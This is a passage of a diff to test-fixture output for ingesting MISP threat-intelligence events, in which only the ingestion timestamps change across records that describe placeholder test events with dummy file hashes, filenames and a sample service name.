object\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"3\",\"timestamp\":\"1621591770\",\"uuid\":\"d98a8418-9f90-4b50-a623-6921ca5b356d\"}}", "category": 
"threat", "type": "indicator", 
@@ -1117,7 +1117,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827879998Z", + "ingested": "2021-12-09T13:49:02.948985800Z", "original": "{\"Event\":{\"Attribute\":[],\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Other\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":true,\"distribution\":\"5\",\"event_id\":\"3635\",\"first_seen\":null,\"id\":\"266272\",\"last_seen\":null,\"object_id\":\"18209\",\"object_relation\":\"text\",\"sharing_group_id\":\"0\",\"timestamp\":\"1621592379\",\"to_ids\":false,\"type\":\"text\",\"uuid\":\"188a6a15-5704-4e4f-acba-22c55ab08fe8\",\"value\":\"Object 5 free text attribute in object\"},\"ObjectReference\":[],\"comment\":\"event 5 object comment\",\"deleted\":false,\"description\":\"File object describing a file with meta-information\",\"distribution\":\"5\",\"event_id\":\"3635\",\"first_seen\":null,\"id\":\"18209\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1621592379\",\"uuid\":\"a62cb6fb-fa1c-45ce-abb8-b46da23631d5\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"5\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3635\",\"info\":\"Test event 5 with an object\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1621592379\",\"uuid\":\"8b8786f1-07f2-4bfc-a3f0-e63c22fcc25e\"}}", "category": "threat", 
"type": "indicator", 
@@ -1190,7 +1190,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827886230Z", + "ingested": "2021-12-09T13:49:02.948991500Z", "original": "{\"Event\":{\"Attribute\":[],\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Other\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":true,\"distribution\":\"5\",\"event_id\":\"3635\",\"first_seen\":null,\"id\":\"266275\",\"last_seen\":null,\"object_id\":\"18209\",\"object_relation\":\"entropy\",\"sharing_group_id\":\"0\",\"timestamp\":\"1621592379\",\"to_ids\":false,\"type\":\"float\",\"uuid\":\"2400b103-4a33-4f92-ac04-a558b6c6e252\",\"value\":\"0.53535445\"},\"ObjectReference\":[],\"comment\":\"event 5 object comment\",\"deleted\":false,\"description\":\"File object describing a file with meta-information\",\"distribution\":\"5\",\"event_id\":\"3635\",\"first_seen\":null,\"id\":\"18209\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1621592379\",\"uuid\":\"a62cb6fb-fa1c-45ce-abb8-b46da23631d5\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"5\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3635\",\"info\":\"Test event 5 with an object\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1621592379\",\"uuid\":\"8b8786f1-07f2-4bfc-a3f0-e63c22fcc25e\"}}", "category": "threat", "type": "indicator", 
@@ -1263,7 +1263,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827892031Z", + "ingested": "2021-12-09T13:49:02.948997100Z", "original": "{\"Event\":{\"Attribute\":[],\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Other\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":true,\"distribution\":\"5\",\"event_id\":\"3635\",\"first_seen\":null,\"id\":\"266276\",\"last_seen\":null,\"object_id\":\"18209\",\"object_relation\":\"size-in-bytes\",\"sharing_group_id\":\"0\",\"timestamp\":\"1621592379\",\"to_ids\":false,\"type\":\"size-in-bytes\",\"uuid\":\"e5ea3ec0-cdf4-4d3e-bd66-a7bf384fd3d7\",\"value\":\"55555\"},\"ObjectReference\":[],\"comment\":\"event 5 object comment\",\"deleted\":false,\"description\":\"File object describing a file with meta-information\",\"distribution\":\"5\",\"event_id\":\"3635\",\"first_seen\":null,\"id\":\"18209\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1621592379\",\"uuid\":\"a62cb6fb-fa1c-45ce-abb8-b46da23631d5\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"5\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3635\",\"info\":\"Test event 5 with an object\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1621592379\",\"uuid\":\"8b8786f1-07f2-4bfc-a3f0-e63c22fcc25e\"}}", "category": "threat", "type": 
"indicator", 
@@ -1340,7 +1340,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827898042Z", + "ingested": "2021-12-09T13:49:02.949003Z", "original": "{\"Event\":{\"Attribute\":[],\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3635\",\"first_seen\":null,\"id\":\"266273\",\"last_seen\":null,\"object_id\":\"18209\",\"object_relation\":\"sha256\",\"sharing_group_id\":\"0\",\"timestamp\":\"1621592379\",\"to_ids\":true,\"type\":\"sha256\",\"uuid\":\"803f10bd-9087-4169-8699-277579a92693\",\"value\":\"567caa7653723f8818ec9eb6f2e27f6d9d8c0aca0c96fc457659340e7bbdc665\"},\"ObjectReference\":[],\"comment\":\"event 5 object comment\",\"deleted\":false,\"description\":\"File object describing a file with meta-information\",\"distribution\":\"5\",\"event_id\":\"3635\",\"first_seen\":null,\"id\":\"18209\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1621592379\",\"uuid\":\"a62cb6fb-fa1c-45ce-abb8-b46da23631d5\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"5\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3635\",\"info\":\"Test event 5 with an 
object\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1621592379\",\"uuid\":\"8b8786f1-07f2-4bfc-a3f0-e63c22fcc25e\"}}", "category": "threat", "type": "indicator", 
@@ -1415,7 +1415,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827903663Z", + "ingested": "2021-12-09T13:49:02.949008700Z", "original": "{\"Event\":{\"Attribute\":[],\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":true,\"distribution\":\"5\",\"event_id\":\"3635\",\"first_seen\":null,\"id\":\"266274\",\"last_seen\":null,\"object_id\":\"18209\",\"object_relation\":\"filename\",\"sharing_group_id\":\"0\",\"timestamp\":\"1621592379\",\"to_ids\":true,\"type\":\"filename\",\"uuid\":\"e5c7a9f0-c0e1-4024-9ab8-de8a1b403e4f\",\"value\":\"object5.txt\"},\"ObjectReference\":[],\"comment\":\"event 5 object comment\",\"deleted\":false,\"description\":\"File object describing a file with meta-information\",\"distribution\":\"5\",\"event_id\":\"3635\",\"first_seen\":null,\"id\":\"18209\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1621592379\",\"uuid\":\"a62cb6fb-fa1c-45ce-abb8-b46da23631d5\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"5\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3635\",\"info\":\"Test event 5 with an object\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1621592379\",\"uuid\":\"8b8786f1-07f2-4bfc-a3f0-e63c22fcc25e\"}}", "category": "threat", "type": 
"indicator", 
@@ -1506,7 +1506,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827909424Z", + "ingested": "2021-12-09T13:49:02.949014300Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Artifacts dropped\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266277\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1622200249\",\"to_ids\":false,\"type\":\"windows-service-name\",\"uuid\":\"3bd56a61-77f0-4885-8d1c-8bd2e39b65fb\",\"value\":\"badmojopipe\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Other\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":true,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266278\",\"last_seen\":null,\"object_id\":\"18210\",\"object_relation\":\"text\",\"sharing_group_id\":\"0\",\"timestamp\":\"1622200348\",\"to_ids\":false,\"type\":\"text\",\"uuid\":\"955e34a5-a630-42c9-868d-6e3dcb575987\",\"value\":\"Excutable create bad pipe\"},\"ObjectReference\":[],\"comment\":\"\",\"deleted\":false,\"description\":\"File object describing a file with 
meta-information\",\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"18210\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1622200348\",\"uuid\":\"afe43d99-d8b6-47fa-8e7b-3d3ece2f8366\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"9\",\"date\":\"2021-05-28\",\"disable_correlation\":false,\"distribution\":\"0\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3636\",\"info\":\"Test event 6 with multiple objects and multiple attributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1622200781\",\"uuid\":\"81aea1d1-bb23-4bcd-9b0c-496e9ce028df\"}}", "category": "threat", "type": "indicator", 
@@ -1597,7 +1597,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827914784Z", + "ingested": "2021-12-09T13:49:02.949020Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Artifacts dropped\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266277\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1622200249\",\"to_ids\":false,\"type\":\"windows-service-name\",\"uuid\":\"3bd56a61-77f0-4885-8d1c-8bd2e39b65fb\",\"value\":\"badmojopipe\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Other\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":true,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266281\",\"last_seen\":null,\"object_id\":\"18211\",\"object_relation\":\"size-in-bytes\",\"sharing_group_id\":\"0\",\"timestamp\":\"1622200780\",\"to_ids\":false,\"type\":\"size-in-bytes\",\"uuid\":\"2fa7721b-ad73-4914-b082-8d44233ced98\",\"value\":\"3892\"},\"ObjectReference\":[],\"comment\":\"\",\"deleted\":false,\"description\":\"Object describing a section of a Portable 
Executable\",\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"18211\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"pe-section\",\"sharing_group_id\":\"0\",\"template_uuid\":\"198a17d2-a135-4b25-9a32-5aa4e632014a\",\"template_version\":\"3\",\"timestamp\":\"1622200780\",\"uuid\":\"023be568-34d6-4df4-ae88-f4de0dbfcd9d\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"9\",\"date\":\"2021-05-28\",\"disable_correlation\":false,\"distribution\":\"0\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3636\",\"info\":\"Test event 6 with multiple objects and multiple attributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1622200781\",\"uuid\":\"81aea1d1-bb23-4bcd-9b0c-496e9ce028df\"}}", "category": "threat", "type": "indicator", 
@@ -1688,7 +1688,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827934551Z", + "ingested": "2021-12-09T13:49:02.949025700Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Artifacts dropped\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266277\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1622200249\",\"to_ids\":false,\"type\":\"windows-service-name\",\"uuid\":\"3bd56a61-77f0-4885-8d1c-8bd2e39b65fb\",\"value\":\"badmojopipe\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Other\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":true,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266283\",\"last_seen\":null,\"object_id\":\"18211\",\"object_relation\":\"name\",\"sharing_group_id\":\"0\",\"timestamp\":\"1622200780\",\"to_ids\":false,\"type\":\"text\",\"uuid\":\"d35c1ff8-a69c-482b-8fb0-1182988d9468\",\"value\":\".data\"},\"ObjectReference\":[],\"comment\":\"\",\"deleted\":false,\"description\":\"Object describing a section of a Portable 
Executable\",\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"18211\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"pe-section\",\"sharing_group_id\":\"0\",\"template_uuid\":\"198a17d2-a135-4b25-9a32-5aa4e632014a\",\"template_version\":\"3\",\"timestamp\":\"1622200780\",\"uuid\":\"023be568-34d6-4df4-ae88-f4de0dbfcd9d\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"9\",\"date\":\"2021-05-28\",\"disable_correlation\":false,\"distribution\":\"0\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3636\",\"info\":\"Test event 6 with multiple objects and multiple attributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1622200781\",\"uuid\":\"81aea1d1-bb23-4bcd-9b0c-496e9ce028df\"}}", "category": "threat", "type": "indicator", 
@@ -1779,7 +1779,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827943458Z", + "ingested": "2021-12-09T13:49:02.949031300Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Artifacts dropped\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266277\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1622200249\",\"to_ids\":false,\"type\":\"windows-service-name\",\"uuid\":\"3bd56a61-77f0-4885-8d1c-8bd2e39b65fb\",\"value\":\"badmojopipe\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Other\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":true,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266284\",\"last_seen\":null,\"object_id\":\"18211\",\"object_relation\":\"text\",\"sharing_group_id\":\"0\",\"timestamp\":\"1622200780\",\"to_ids\":false,\"type\":\"text\",\"uuid\":\"dc11971a-a676-4676-b24c-a45a8791e0b0\",\"value\":\"Extracted zip archive data\"},\"ObjectReference\":[],\"comment\":\"\",\"deleted\":false,\"description\":\"Object describing a section of a Portable 
Executable\",\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"18211\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"pe-section\",\"sharing_group_id\":\"0\",\"template_uuid\":\"198a17d2-a135-4b25-9a32-5aa4e632014a\",\"template_version\":\"3\",\"timestamp\":\"1622200780\",\"uuid\":\"023be568-34d6-4df4-ae88-f4de0dbfcd9d\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"9\",\"date\":\"2021-05-28\",\"disable_correlation\":false,\"distribution\":\"0\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3636\",\"info\":\"Test event 6 with multiple objects and multiple attributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1622200781\",\"uuid\":\"81aea1d1-bb23-4bcd-9b0c-496e9ce028df\"}}", "category": "threat", "type": "indicator", 
@@ -1870,7 +1870,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827949679Z", + "ingested": "2021-12-09T13:49:02.949037Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Artifacts dropped\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266277\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1622200249\",\"to_ids\":false,\"type\":\"windows-service-name\",\"uuid\":\"3bd56a61-77f0-4885-8d1c-8bd2e39b65fb\",\"value\":\"badmojopipe\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Other\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":true,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266285\",\"last_seen\":null,\"object_id\":\"18211\",\"object_relation\":\"entropy\",\"sharing_group_id\":\"0\",\"timestamp\":\"1622200780\",\"to_ids\":false,\"type\":\"float\",\"uuid\":\"a85c0cbb-25a8-4bc9-b146-3cba1020e5bb\",\"value\":\"7.93280431051\"},\"ObjectReference\":[],\"comment\":\"\",\"deleted\":false,\"description\":\"Object describing a section of a Portable 
Executable\",\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"18211\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"pe-section\",\"sharing_group_id\":\"0\",\"template_uuid\":\"198a17d2-a135-4b25-9a32-5aa4e632014a\",\"template_version\":\"3\",\"timestamp\":\"1622200780\",\"uuid\":\"023be568-34d6-4df4-ae88-f4de0dbfcd9d\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"9\",\"date\":\"2021-05-28\",\"disable_correlation\":false,\"distribution\":\"0\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3636\",\"info\":\"Test event 6 with multiple objects and multiple attributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1622200781\",\"uuid\":\"81aea1d1-bb23-4bcd-9b0c-496e9ce028df\"}}", "category": "threat", "type": "indicator", 
@@ -1965,7 +1965,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827955981Z", + "ingested": "2021-12-09T13:49:02.949089200Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Artifacts dropped\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266277\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1622200249\",\"to_ids\":false,\"type\":\"windows-service-name\",\"uuid\":\"3bd56a61-77f0-4885-8d1c-8bd2e39b65fb\",\"value\":\"badmojopipe\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266279\",\"last_seen\":null,\"object_id\":\"18210\",\"object_relation\":\"md5\",\"sharing_group_id\":\"0\",\"timestamp\":\"1622200348\",\"to_ids\":true,\"type\":\"md5\",\"uuid\":\"1c97c043-5de2-41a1-b591-3237174cd290\",\"value\":\"7392463caf95534d56460bc9f360adc1\"},\"ObjectReference\":[],\"comment\":\"\",\"deleted\":false,\"description\":\"File object describing a file with 
meta-information\",\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"18210\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1622200348\",\"uuid\":\"afe43d99-d8b6-47fa-8e7b-3d3ece2f8366\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"9\",\"date\":\"2021-05-28\",\"disable_correlation\":false,\"distribution\":\"0\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3636\",\"info\":\"Test event 6 with multiple objects and multiple attributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1622200781\",\"uuid\":\"81aea1d1-bb23-4bcd-9b0c-496e9ce028df\"}}", "category": "threat", "type": "indicator", 
@@ -2060,7 +2060,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827962123Z", + "ingested": "2021-12-09T13:49:02.949092700Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Artifacts dropped\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266277\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1622200249\",\"to_ids\":false,\"type\":\"windows-service-name\",\"uuid\":\"3bd56a61-77f0-4885-8d1c-8bd2e39b65fb\",\"value\":\"badmojopipe\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload 